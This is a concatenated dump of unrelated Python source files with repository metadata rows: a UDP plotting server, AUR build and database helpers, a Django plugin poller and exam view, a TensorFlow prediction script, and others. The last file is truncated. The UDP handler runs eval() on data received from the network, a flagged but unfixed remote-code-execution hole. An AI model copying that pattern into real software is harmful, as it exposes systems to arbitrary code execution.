            # Rasterize the figure and blit it to the pyformulas screen.
            image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
            image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
            screen.update(image)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
    """Handle one UDP datagram: parse a reading and append it to the shared series."""

    def __init__(self, request, client_address, server):
        # Mirrors BaseRequestHandler.__init__, but guarantees finish() runs
        # even if handle() raises.
        self.request = request
        self.client_address = client_address
        self.server = server
        try:
            self.handle()
        finally:
            self.finish()

    def updateData(self, x, y):
        """Append one (time, voltage) sample, keeping at most the last 50 points."""
        # threadLock.acquire()
        xs.append(x)
        ys.append(y)
        if len(xs) > 50:
            del xs[0]
            del ys[0]
        # threadLock.release()

    def handle(self):
        # For a UDP server, self.request is (data, socket); recvfrom reads the
        # datagram bytes sent by the client.
        data, addr = self.request[1].recvfrom(1024)
        # Renamed from `str`, which shadowed the builtin.
        text = data.decode('utf-8')
        # SECURITY: eval() on data received from the network executes arbitrary
        # code. Kept (the sender's exact payload format is not visible here),
        # but if the client emits JSON, json.loads(text)[0] is a safe drop-in.
        dic = eval(text)[0]
        volt = dic['voltage']
        time = dic['time']
        # Push the new sample into the shared plotting buffers.
        self.updateData(time, volt)
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
    # The ThreadingMixIn spawns a new thread per datagram; no extra behaviour needed.
    pass
if __name__ == "__main__":
    # NOTE(review): this lock is never acquired — the acquire/release calls in
    # PlotThread and the handler are commented out.
    threadLock = threading.Lock()
    # Shared sample buffers: appended by the UDP handler, read by the plot thread.
    xs = [0]
    ys = [0]
    plotThread = PlotThread(xs, ys)
    plotThread.start()
    HOST, PORT = "", 20000
    server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
    # NOTE(review): server_thread is created but never started; the final
    # serve_forever() call below runs the server on the main thread instead,
    # so this thread object is vestigial.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
    print("Server loop running in thread:", server_thread.name)
    print(" .... waiting for connection")
    # Activate the server; this will keep running until you
    # interrupt the program with Ctrl-C
    server.serve_forever()
"[email protected]"
]
| |
52b05d3878abcb4c78e0e865d6199cb611986340 | 891127dfec1e5255cd403f4aedbe0ef18b5c8567 | /python-notify2/lilac.py | 8678e267dc883732492e08565ebc85e226202699 | []
| no_license | kktt007/repo | df708b5841474fbbf720994f9278a906a908b63b | fc039d08425081834384f84c8ffe9d3923849165 | refs/heads/master | 2020-04-03T06:03:10.517303 | 2018-10-28T11:23:08 | 2018-10-28T11:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | #!/usr/bin/env python3
#
# This file is the most simple lilac.py file,
# and it suits for most packages in AUR.
#
from lilaclib import *
# Arch chroot to build in, and the standard AUR post-build hook from lilaclib.
build_prefix = 'extra-x86_64'
post_build = aur_post_build
def pre_build():
    """Fetch the AUR files, then patch PKGBUILD before building.

    Adds 'python-setuptools' to the depends= array and, when the package is
    still at pkgver 0.3, bumps pkgrel from 1 to 2 to force a rebuild.
    """
    aur_pre_build()
    need_rebuild = False
    # edit_file appears to yield PKGBUILD line by line, with print() emitting
    # the replacement content — behaviour provided by lilaclib (verify).
    for line in edit_file('PKGBUILD'):
        # edit PKGBUILD
        if line.strip().startswith("depends="):
            # Insert just before the closing element of the depends=(...) array.
            words = line.split(" ")
            words.insert(-1, "'python-setuptools'")
            line = " ".join(words)
        if line.strip().startswith("pkgver=0.3"):
            need_rebuild = True
        if need_rebuild and line.strip().startswith("pkgrel=1"):
            line = "pkgrel=2"
        print(line)
# Entry point provided by lilaclib for single-package builds.
if __name__ == '__main__':
    single_main()
| [
"[email protected]"
]
| |
ca5216e0c168037fe25b76c19ba7275392c36af3 | f41bd639f249ef6029e310bee84c6ef03f5d6f19 | /databundles/database/__init__.py | 8a086a851a744ff6f4b771d0f9f09df297feec4a | []
| no_license | kball/databundles | 5e3d478c1977a0481d77131dd573c8f199e2c95d | 142f20705c8be6cb136adef3a94c8fa7b7119b88 | refs/heads/master | 2021-01-21T03:30:32.822333 | 2014-01-23T23:57:57 | 2014-01-23T23:57:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,795 | py | """
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
from __future__ import absolute_import
from ..dbexceptions import ConfigurationError
from collections import namedtuple
def new_database(config, bundle=None, class_=None):
    """Construct a database object from a configuration dict.

    Dispatches on (config['driver'], class), where class comes from
    config['class'] when present, otherwise from the class_ argument.
    Raises ConfigurationError when both are given and disagree, and
    NotImplementedError for driver/class combinations that have no backend.

    BUGFIX: the unimplemented branches previously did ``raise NotImplemented()``,
    which raises TypeError ('NotImplemented' object is not callable) rather
    than NotImplementedError.
    """
    service = config['driver']

    if 'class' in config and class_ and config['class'] != class_:
        raise ConfigurationError("Mismatch in class configuration {} != {}".format(config['class'], class_))

    class_ = config['class'] if 'class' in config else class_

    k = (service, class_)

    if k == ('sqlite', None):
        from .sqlite import SqliteBundleDatabase  # @UnresolvedImport
        return SqliteBundleDatabase(bundle=bundle, **config)
    elif k == ('mysql', None):
        raise NotImplementedError()
    elif k == ('postgres', None):
        from .relational import RelationalDatabase  # @UnresolvedImport
        return RelationalDatabase(**config)
    elif k == ('postgis', None):
        from .postgis import PostgisDatabase  # @UnresolvedImport
        return PostgisDatabase(**config)
    elif k == ('sqlite', 'bundle'):
        from .sqlite import SqliteBundleDatabase  # @UnresolvedImport
        return SqliteBundleDatabase(bundle=bundle, **config)
    elif k == ('sqlite', 'warehouse'):
        from .sqlite import SqliteWarehouseDatabase  # @UnresolvedImport
        # NOTE: this mutates the caller's config dict (removes 'dbname').
        dbname = config['dbname']
        del config['dbname']
        return SqliteWarehouseDatabase(dbname, **config)
    elif k == ('mysql', 'warehouse'):
        raise NotImplementedError()
    elif k == ('postgres', 'warehouse'):
        raise NotImplementedError()
    # NOTE(review): unknown (driver, class) combinations fall through and
    # return None; callers may prefer a ConfigurationError here.
class DatabaseInterface(object):
    """Abstract interface that all database backends must implement.

    Every method raises NotImplementedError; concrete subclasses (sqlite,
    relational, postgis, ...) override the operations they support.
    """

    @property
    def name(self):
        raise NotImplementedError()

    def exists(self):
        raise NotImplementedError()

    def create(self):
        raise NotImplementedError()

    def add_post_create(self, f):
        # f: callback to run after schema creation.
        raise NotImplementedError()

    def delete(self):
        raise NotImplementedError()

    def open(self):
        raise NotImplementedError()

    def close(self):
        raise NotImplementedError()

    def inserter(self, table_or_name=None, **kwargs):
        raise NotImplementedError()

    def updater(self, table_or_name=None, **kwargs):
        raise NotImplementedError()

    def commit(self):
        raise NotImplementedError()

    def tables(self):
        raise NotImplementedError()

    def has_table(self, table_name):
        raise NotImplementedError()

    def create_table(self, table):
        raise NotImplementedError()

    def drop_table(self, table_name):
        raise NotImplementedError()
| [
"[email protected]"
]
| |
eca77010769b565283b9e1d850d441836c5dc8f3 | 990b92264109dc01dbfddeb6f5e75675037fd829 | /app/cito_engine/poller/pluginpoller.py | 123be6b2b244c4a01e2c2503321bc5c5146f53f8 | [
"Apache-2.0"
]
| permissive | CitoEngine/cito_engine | 20efa189abab1b684b60b260c1ea9ed16f6ea0f2 | 95852dd109d86a344726d7b11ed1132d4e48426b | refs/heads/master | 2020-05-21T15:04:24.011603 | 2019-02-08T04:51:42 | 2019-02-08T04:51:42 | 17,123,947 | 9 | 13 | Apache-2.0 | 2019-02-08T04:51:43 | 2014-02-24T03:17:04 | Python | UTF-8 | Python | false | false | 3,548 | py | # Django settings for cito project.
# Copyright (c) 2012-2013 Cyrus Dasadia <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import requests
import logging
from cito_engine.models import Plugin, PluginServer
logger = logging.getLogger('poller_logger')
def pluginpoller(server):
    """Fetch the plugin list from one PluginServer and sync the local Plugin rows.

    Returns True on success, False when the server is unreachable or returns
    invalid JSON. Plugins that disappeared from the remote server are disabled
    locally rather than deleted.
    """
    url = server.url+'/getallplugins'
    try:
        response = requests.get(url, verify=server.ssl_verify)
    except Exception as e:  # fixed: "except Exception, e" is Python-2-only syntax
        logger.error('Could not connect to PluginServer: %s [EXCEPTION] %s' % (url, e))
        return False
    try:
        jsondata = response.json()
    except ValueError:  # narrowed from bare except; .json() raises ValueError on bad JSON
        # fixed: the %s placeholder previously had no argument supplied
        logger.error('PluginServer: %s gave invalid JSON response' % url)
        return False
    logger.info("Found %s plugins" % len(jsondata))
    pluginNames = []
    # Add or update plugins
    for k in jsondata:
        pluginNames.append(k['plugins']['name'])
        try:
            p = Plugin.objects.get(server=server, name__iexact=k['plugins']['name'])
            p.description = k['plugins']['description']
            p.status = k['plugins']['status']
            p.save()
            logger.info("Plugin: %s already existed and updated" % k['plugins']['name'])
        except Plugin.DoesNotExist:
            Plugin.objects.create(server=server,
                                  name=k['plugins']['name'],
                                  description=k['plugins']['description'],
                                  status=k['plugins']['status'])
            logger.info('Plugin: %s added' % k['plugins']['name'])
        except Plugin.MultipleObjectsReturned:
            logger.error("More than one plugin exists for %s, remove the duplicates!" % k['plugins']['name'])
        except Exception as e:
            logger.error("Could not add plugin, reason:%s" % e)
    # Disable all deprecated plugins
    plugins = Plugin.objects.filter(server=server)
    if plugins is not None:
        for p in plugins:
            if p.name not in pluginNames:
                logger.info("Plugin: %s is deprecated on plugin server, disabling here" % p.name)
                p.description = 'WARNING: This plugin has been DEPRECATED on remote server!!!!\n'
                p.status = False
                p.save()
    return True
def update_plugins():
    """Poll every enabled plugin server and refresh its plugin records."""
    for server in PluginServer.objects.all():
        if not server.status:
            logger.info("Server at %s ignored." % server.name)
            continue
        logger.info("Fetching from %s" % server.name)
        pluginpoller(server)
| [
"[email protected]"
]
| |
0da2a858c8b43266110789edbbd9fbfc44c0485f | 0ca9e6a6fa9a05231d2248e9991c50d74173e546 | /B0_CNN-RNN-text/predict2.py | d19a91c2ae46186a8cd09254b83dc0537f1e4037 | []
| no_license | Timaos123/LogstashAI | 8aa07b74c0bfd46ab9bd4ff6b10549057e36c477 | 0b9ec6a27ebc07584503dc69e29475e98ebc102b | refs/heads/master | 2020-04-02T14:34:48.648972 | 2018-10-24T16:44:41 | 2018-10-24T16:44:41 | 154,530,107 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | import os
import sys
import json
import shutil
import pickle
import logging
import data_helper
import numpy as np
import pandas as pd
import tensorflow as tf
from text_cnn_rnn import TextCNNRNN
logging.getLogger().setLevel(logging.INFO)
def load_trained_params(trained_dir):
    """Load the artifacts saved by training from `trained_dir`.

    Returns (params dict, word->index vocab, label list, embedding matrix).
    BUGFIX: the three JSON files were previously opened without being closed;
    `with` blocks now guarantee the handles are released.
    """
    with open(trained_dir + 'trained_parameters.json') as f:
        params = json.loads(f.read())
    with open(trained_dir + 'words_index.json') as f:
        words_index = json.loads(f.read())
    with open(trained_dir + 'labels.json') as f:
        labels = json.loads(f.read())

    with open(trained_dir + 'embeddings.pickle', 'rb') as input_file:
        fetched_embedding = pickle.load(input_file)
    embedding_mat = np.array(fetched_embedding, dtype=np.float32)
    return params, words_index, labels, embedding_mat
def load_test_data(test_file, labels):
    """Load the evaluation CSV and binarize its severity column.

    Rows with severity 'crit' or 'err' become class 1, everything else class 0.
    Returns (tokenized messages, one-hot label vectors or None if the frame
    has no severity column, DataFrame trimmed to the selected columns).
    """
    df = pd.read_csv(test_file)
    # Collapse syslog severities into a binary target: crit/err -> 1, rest -> 0.
    df.loc[df.severity=="crit","severity"]=1
    df.loc[df.severity=="err","severity"]=1
    df.loc[df.severity!=1,"severity"]=0
    # print(df)
    select = ['message']
    df = df.dropna(axis=0, how='any', subset=select)
    # Clean and whitespace-tokenize each message.
    test_examples = df[select[0]].apply(lambda x: data_helper.clean_str(x).split(' ')).tolist()

    # Build a one-hot row per label, keyed by label value.
    num_labels = len(labels)
    one_hot = np.zeros((num_labels, num_labels), int)
    np.fill_diagonal(one_hot, 1)
    label_dict = dict(zip(labels, one_hot))

    y_ = None
    if 'severity' in df.columns:
        select.append('severity')
        y_ = df[select[1]].apply(lambda x: label_dict[x]).tolist()
    # Drop everything except the message (and severity, when present).
    not_select = list(set(df.columns) - set(select))
    df = df.drop(not_select, axis=1)
    return test_examples, y_, df
def map_word_to_index(examples, words_index):
    """Translate tokenized examples into index sequences.

    Words missing from `words_index` map to 0 (the padding/unknown id).
    """
    return [[words_index.get(word, 0) for word in example] for example in examples]
def getRP(preY, testY):
    """Return (recall, precision) for binary predictions vs. true labels.

    recall    = TP / (TP + FN)  — fraction of actual positives found
    precision = TP / (TP + FP)  — fraction of predicted positives correct

    Raises ZeroDivisionError when there are no actual positives (recall) or
    no predicted positives (precision), matching the original behaviour.

    NOTE: the original local names `fp` and `fn` were swapped relative to
    their usual meaning; the two swaps cancelled so the returned values were
    already correct. The counters are renamed here for clarity only.
    """
    tp = fp = tn = fn = 0
    for pred, actual in zip(preY, testY):
        if pred == actual and actual == 1:
            tp += 1
        elif pred != actual and actual == 1:
            fn += 1  # predicted 0, actually 1: false negative
        elif pred == actual and actual == 0:
            tn += 1
        elif pred != actual and actual == 0:
            fp += 1  # predicted 1, actually 0: false positive
    recall = tp / (tp + fn)
    precision = tp / (tp + fp)
    return recall, precision
def predict_unseen_data():
    """Restore the trained CNN-RNN checkpoint and label an unseen CSV.

    Writes predictions_all.csv into a fresh ./predicted_results_<timestamp>/
    folder and, when the evaluation file carries labels, logs accuracy,
    recall and precision.
    """
    trained_dir = "./trained_results_1524214944/"
    if not trained_dir.endswith('/'):
        trained_dir += '/'
    test_file = "valData.csv"

    params, words_index, labels, embedding_mat = load_trained_params(trained_dir)
    x_, y_, df = load_test_data(test_file, labels)
    # Pad/trim to the training sequence length, then map tokens to vocab ids.
    x_ = data_helper.pad_sentences(x_, forced_sequence_length=params['sequence_length'])
    x_ = map_word_to_index(x_, words_index)

    x_test, y_test = np.asarray(x_), None
    if y_ is not None:
        y_test = np.asarray(y_)

    # Name the output folder after the timestamp embedded in trained_dir.
    timestamp = trained_dir.split('/')[-2].split('_')[-1]
    predicted_dir = './predicted_results_' + timestamp + '/'
    if os.path.exists(predicted_dir):
        shutil.rmtree(predicted_dir)
    os.makedirs(predicted_dir)

    with tf.Graph().as_default():
        session_conf = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
        sess = tf.Session(config=session_conf)
        with sess.as_default():
            cnn_rnn = TextCNNRNN(
                embedding_mat = embedding_mat,
                non_static = params['non_static'],
                hidden_unit = params['hidden_unit'],
                sequence_length = len(x_test[0]),
                max_pool_size = params['max_pool_size'],
                # NOTE(review): map() is a lazy iterator on Python 3; assumes
                # TextCNNRNN materializes it — confirm when targeting py3.
                filter_sizes = map(int, params['filter_sizes'].split(",")),
                num_filters = params['num_filters'],
                num_classes = len(labels),
                embedding_size = params['embedding_dim'],
                l2_reg_lambda = params['l2_reg_lambda'])

            def real_len(batches):
                # Effective (post max-pooling) sequence length of each batch row.
                return [np.ceil(np.argmin(batch + [0]) * 1.0 / params['max_pool_size']) for batch in batches]

            def predict_step(x_batch):
                # Run one inference pass with dropout disabled.
                feed_dict = {
                    cnn_rnn.input_x: x_batch,
                    cnn_rnn.dropout_keep_prob: 1.0,
                    cnn_rnn.batch_size: len(x_batch),
                    cnn_rnn.pad: np.zeros([len(x_batch), 1, params['embedding_dim'], 1]),
                    cnn_rnn.real_len: real_len(x_batch),
                }
                predictions = sess.run([cnn_rnn.predictions], feed_dict)
                return predictions

            checkpoint_file = trained_dir + 'best_model.ckpt'
            # NOTE(review): this Saver is immediately replaced by the
            # import_meta_graph call below — the first assignment is dead.
            saver = tf.train.Saver(tf.all_variables())
            saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
            saver.restore(sess, checkpoint_file)
            logging.critical('{} has been loaded'.format(checkpoint_file))

            batches = data_helper.batch_iter(list(x_test), params['batch_size'], 1, shuffle=False)

            predictions, predict_labels = [], []
            for x_batch in batches:
                batch_predictions = predict_step(x_batch)[0]
                for batch_prediction in batch_predictions:
                    predictions.append(batch_prediction)
                    predict_labels.append(labels[batch_prediction])

            # Save the predictions back to file
            df['NEW_PREDICTED'] = predict_labels
            columns = sorted(df.columns, reverse=True)
            df.to_csv(predicted_dir + 'predictions_all.csv', index=False, columns=columns)

            if y_test is not None:
                # Convert one-hot rows back to class indices before scoring.
                y_test = np.array(np.argmax(y_test, axis=1))
                accuracy = sum(np.array(predictions) == y_test) / float(len(y_test))
                logging.critical('The prediction accuracy is: {}'.format(accuracy))
                recall,precision=getRP(np.array(predictions),y_test)
                logging.critical('The prediction Recall and Precision are: {},{}'.format(recall,precision))

            logging.critical('Prediction is complete, all files have been saved: {}'.format(predicted_dir))
if __name__ == '__main__':
    # python3 predict.py ./trained_results_1478563595/ ./data/small_samples.csv
    # NOTE(review): the usage line above is stale — argv is ignored and the
    # paths are hard-coded inside predict_unseen_data().
    predict_unseen_data()
| [
"[email protected]"
]
| |
25d5fc581028991eafab2166d9a68b78fd919440 | 9de28c08400250025f4bdc5676bac3b82f4a404d | /Unified/assignSchema.py | fb2db6eb24f398dbbfc3540c186ddfbc2babaa93 | []
| no_license | AndrewLevin/WmAgentScripts | f4b8edb6b668d128e12d55b396c67f9efb727e6f | 4eab70df00d7a314a4d7d115e1eb0dbdac823165 | refs/heads/master | 2020-12-31T03:35:14.564731 | 2016-12-06T20:37:51 | 2016-12-06T20:37:51 | 14,967,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,692 | py | import os
import sys
from sqlalchemy import Column, ForeignKey, Integer, String, PickleType, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
Base = declarative_base()
#class McMID(Base):
# __tablename__ = 'mcm'
# id = Column(Integer, primary_key=True)
# pid = Column(String(400))
# ## and whatever else you want
class Workflow(Base):
    """A request-manager workflow tracked between assignment and announcement."""
    __tablename__ = 'workflow'
    id = Column(Integer, primary_key=True)
    name = Column(String(400))
    status = Column(String(30),default='considered') ## internal status
    wm_status = Column(String(30),default='assignment-approved') ## status in req manager : we might not be carrying much actually since we are between ass-approved and assigned, although announced is coming afterwards
    # Fraction of expected output required before the workflow can be closed.
    fraction_for_closing = Column(Float,default=0.90)
class Output(Base):
    """One output dataset produced by a workflow, with its completion counters."""
    __tablename__ = 'output'
    id = Column(Integer, primary_key=True)
    datasetname = Column(String(400))
    nlumis = Column(Integer)
    expectedlumis = Column(Integer)
    nevents = Column(Integer)
    nblocks = Column(Integer)
    dsb_status = Column(String(30)) ## in DBS ?
    status = Column(String(30))
    ## workflow it belongs to
    # NOTE(review): "workfow_id" is missing an 'l'. Renaming it would change
    # the database column and break existing rows, so the typo is only flagged.
    workfow_id = Column(Integer,ForeignKey('workflow.id'))
    workflow = relationship(Workflow)
    date = Column(Integer)
class Transfer(Base):
    """A PhEDEx transfer request and the workflow ids it serves."""
    __tablename__ = 'transfer'
    id = Column(Integer, primary_key=True)
    phedexid = Column(Integer)
    # Pickled collection of Workflow ids covered by this transfer.
    workflows_id = Column(PickleType)
    #status = Column(String(30)) ## to be added ?
# Import-time side effect: open/create the sqlite DB file and materialize any
# missing tables declared above.
engine = create_engine('sqlite:///Unified/assignRecord.db')
Base.metadata.create_all(engine)
| [
"[email protected]"
]
| |
89d42651a7c265a1445be2fc09631bf0afbe9c41 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02818/s265134890.py | 8482530bc7f94733b76388fa8ccee8aa0e5fd826 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | #!/usr/bin/env python3
# Generated by https://github.com/kyuridenamida/atcoder-tools
from typing import *
import collections
import functools
import itertools
import math
import sys
INF = float('inf')
def solve(A: int, B: int, K: int):
    """Eat K cookies — Takahashi's A first, then Aoki's B — and report leftovers."""
    remaining_a = max(A - K, 0)
    # Cookies still to be eaten once Takahashi's stash runs out.
    overflow = max(K - A, 0)
    remaining_b = max(B - overflow, 0)
    return f'{remaining_a} {remaining_b}'
def main():
    """Read A, B, K from stdin and print the answer."""
    sys.setrecursionlimit(10 ** 6)
    tokens = (word for line in sys.stdin for word in line.split())
    A = int(next(tokens))
    B = int(next(tokens))
    K = int(next(tokens))
    print(f'{solve(A, B, K)}')
# Script entry point.
if __name__ == '__main__':
    main()
| [
"[email protected]"
]
| |
9d871e6ca56da43854bf44e0d344e875c0c9981e | 2ed4ed28dc150a96954c663f203808ba917712c8 | /learning_site/tracks/views.py | e6c04e087c767566263f7b3f4718117d88d2d770 | []
| no_license | Mostacosta/Mosta-learning-website | 66e813c6fe17b018d750ffa824df751428a20ce8 | a70e94649355e07a5d819e75b09100f7dc5ccc59 | refs/heads/master | 2022-04-01T17:36:23.084318 | 2020-02-04T08:56:37 | 2020-02-04T08:56:37 | 200,877,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,211 | py | from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from .models import track,course,lesson,exam,exam_result
from questions.models import question ,answer
from questions.forms import question_form
from datetime import datetime
import dateutil.parser
from django.utils import timezone
from django.views.decorators.cache import cache_page
import random
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.decorators import login_required
from django.contrib import messages
# Create your views here.
def track_list(request):
    """Render a paginated listing of all tracks, three per page."""
    paginator = Paginator(track.objects.all(), 3)
    requested_page = request.GET.get('page', 1)
    try:
        tracks = paginator.page(requested_page)
    except PageNotAnInteger:
        # Non-numeric page parameter: fall back to the first page.
        tracks = paginator.page(1)
    except EmptyPage:
        # Out-of-range page: clamp to the last page.
        tracks = paginator.page(paginator.num_pages)
    return render(request, 'tracks/track-list.html', {"tracks": tracks})
def course_list(request, pk):
    """Render course details for one track, pairing each course with its lessons."""
    my_track = track.objects.get(pk=pk)
    courses = course.objects.filter(track=my_track).order_by("order")
    points = my_track.points.split(",")
    per_course_lessons = [lesson.objects.filter(course=c) for c in courses]
    zip_ = zip(courses, per_course_lessons)
    # Anonymous visitors get a banner explaining why lessons are locked.
    if not request.user.is_authenticated:
        messages.error(request, "login to be able to preview lessons")
    return render(request, 'tracks/course-details.html',
                  {"courses": zip_, "track": my_track, "len": len(courses), "points": points})
def lesson_list(request, pk):
    """List all lessons belonging to one course."""
    parent_course = course.objects.get(pk=pk)
    lessons = lesson.objects.filter(course=parent_course)
    context = {"lessons": lessons, "course": parent_course.name}
    return render(request, 'tracks/lesson_list.html', context)
def lesson_view(request, pk):
    """Show a lesson's question/answer thread and accept a new question via POST."""
    form = question_form()
    lesson_ = lesson.objects.get(pk=pk)
    if request.method == "POST":
        form = question_form(request.POST, request.FILES)
        if form.is_valid():
            # Attach the author and lesson before the instance is persisted.
            new_question = form.save(commit=False)
            new_question.user = request.user
            new_question.lesson = lesson_
            form.save()
    questions = question.objects.filter(lesson=lesson_)
    answer_sets = [answer.objects.filter(question=q) for q in questions]
    zip_list = zip(questions, answer_sets)
    return render(request, "questions/answer_list.html", {"zip": zip_list, "form": form})
def lesson_watch(request, pk):
    """Record that the current user watched this lesson; idempotent."""
    watched_lesson = lesson.objects.get(pk=pk)
    already_watching = request.user in watched_lesson.watching_users.all()
    if not already_watching:
        watched_lesson.watching_users.add(request.user)
        watched_lesson.save()
    return HttpResponse("watched")
@login_required(redirect_field_name="contacts:signup")
@cache_page(60)
def exam_view (request,pk):
    """Serve and grade a course exam.

    POST without a session start stamp: store the stamp and render the exam.
    POST with a stamp under 30 minutes old: grade; >50% passes. A failure
    locks the exam for 3 days multiplied by the number of failed attempts.
    """
    course_ = course.objects.get(pk=pk)
    # Shuffle question order on every load.
    questions = sorted(exam.objects.filter(course=course_),key=lambda x: random.random())
    try:
        result = exam_result.objects.get(course=course_,user=request.user)
    # NOTE(review): bare except also swallows MultipleObjectsReturned and any
    # other error; exam_result.DoesNotExist is probably what was meant.
    except :
        result = None
    if result :
        # Enforce the retry cool-down: 259200 s = 3 days, scaled by attempts.
        last_time = result.date
        last_time = last_time.replace(tzinfo=None)  # compare as naive datetimes
        dif = datetime.now()-last_time
        dif = dif.total_seconds()
        expire_date = 259200*result.times
        hours = expire_date//(60*60)
        if dif < expire_date:
            return HttpResponse ("comeback after"+str(hours))
    if request.method == "POST":
        if request.session.get('time'):
            # Grade only if the session's start stamp is under 30 minutes old.
            time_ = request.session.get('time')
            past_time = dateutil.parser.parse(time_)
            now_time = datetime.now()
            dif = now_time-past_time
            dif = dif.total_seconds()
            if dif is not None and dif<1800:
                # One point per question whose submitted answer matches.
                score = 0
                for question in questions:
                    if question.right_answer == request.POST[question.name]:
                        score +=1
                precentage = (score/len(questions)) * 100
                if precentage > 50 :
                    # Record the pass and reset the attempt counter.
                    if request.user not in course_.succeeded_users.all():
                        course_.succeeded_users.add(request.user)
                        course_.save()
                    if result:
                        result.case = 'success'
                        result.times =1
                        result.date = timezone.now()
                        result.degree=precentage
                    else:
                        result =exam_result(user=request.user,course=course_,case='success',degree=precentage)
                    result.save()
                    return HttpResponse ("you succed")
                else :
                    # Record the failure; each failure lengthens the cool-down.
                    if result:
                        result.case = 'failed'
                        result.times +=1
                        result.date = timezone.now()
                        result.degree=precentage
                    else:
                        result =exam_result(user=request.user,course=course_,case='failed',degree=precentage)
                    result.save()
                    return HttpResponse ("you failed")
            else:
                return HttpResponse ("no session")
        else:
            # First POST of an attempt: stamp the start time and show the exam.
            # NOTE(review): plain GET requests fall through and return None
            # (HTTP 500); this render likely belongs outside the POST check.
            request.session['time'] = datetime.now().isoformat()
            print(request.session['time'])
            return render (request,'tracks/exam.html',{"questions":questions})
| [
"[email protected]"
]
| |
df3a6464a3e0334638d68082c12f2f987f3ce943 | be1b836b022a52204bc862878ba8d7a9200bd59b | /website/unicode/create_json.py | afea12542356f37620cc445dfd70b497d34b720d | [
"MIT"
]
| permissive | templateK/write-math | b418e7c40a59ce2e673f5804b1c042acd8eb527b | ece645f70341431ac7ca14740ce26ad8153a3900 | refs/heads/master | 2021-01-18T21:48:14.725324 | 2016-05-17T17:57:22 | 2016-05-17T17:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | #!/usr/bin/env python
"""
Create a json file which maps unicode decimal codepoints to descriptions.
https://github.com/w3c/xml-entities is used for that.
"""
import json

# Maps unicode decimal codepoint -> textual description, built from the
# W3C xml-entities data file and dumped to unicode.json.
data = {}

import xml.etree.ElementTree

e = xml.etree.ElementTree.parse('xml-entities/unicode.xml').getroot()
for atype in e.findall('charlist'):
    print("## Charlist found")
    for character in atype.findall('character'):
        try:
            dec = int(character.get('dec'))
            desc = ''
            # Keep the last <description> element of the character, if any.
            for description in character.findall('description'):
                desc = description.text
            data[dec] = desc
        except (TypeError, ValueError):
            # Narrowed from a bare except: skip characters whose 'dec'
            # attribute is missing (TypeError) or not a plain integer
            # (ValueError); anything else should surface.
            pass
with open('unicode.json', 'w') as outfile:
    json.dump(data, outfile, sort_keys=True, indent=1)
| [
"[email protected]"
]
| |
f0ed3ca2be636e6ff87f3318f3e243f68762b6f4 | 4bc24011c65cb5194eb94abfd8d394a6b0dc6a50 | /packages/OpenCV/nodes/OpenCV___BilateralFilter0/OpenCV___BilateralFilter0.py | 6f78c7fc2a7dc5946060fcc88fa05dad405492c9 | [
"MIT"
]
| permissive | ManojKumarTiwari/Ryven | 6c76ebdf89599bb7c9b4ce020f195eea135d9da1 | 2b8ef0bdcf05a458a6cf8791cbc2fda6870932f8 | refs/heads/master | 2022-11-12T00:23:45.303378 | 2020-07-08T09:32:10 | 2020-07-08T09:32:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,485 | py | from custom_src.NodeInstance import NodeInstance
from custom_src.Node import Node
from custom_src.retain import m
import cv2
# USEFUL
# self.input(index) <- access to input data
# self.outputs[index].set_val(val) <- set output data port value
# self.main_widget <- access to main widget
class BilateralFilter_NodeInstance(NodeInstance):
    """Ryven node wrapping cv2.bilateralFilter.

    Inputs: 0 = image, 1 = d (pixel neighbourhood diameter),
    2 = sigmaColor, 3 = sigmaSpace.  Output 0 carries the filtered
    image, which is also pushed to the main widget for preview.
    """

    def __init__(self, parent_node: Node, flow, configuration=None):
        super(BilateralFilter_NodeInstance, self).__init__(parent_node, flow, configuration)

        # self.special_actions['action name'] = self.actionmethod ...
        self.img_unfiltered = None
        self.img_filtered = None

        self.initialized()

    def update_event(self, input_called=-1):
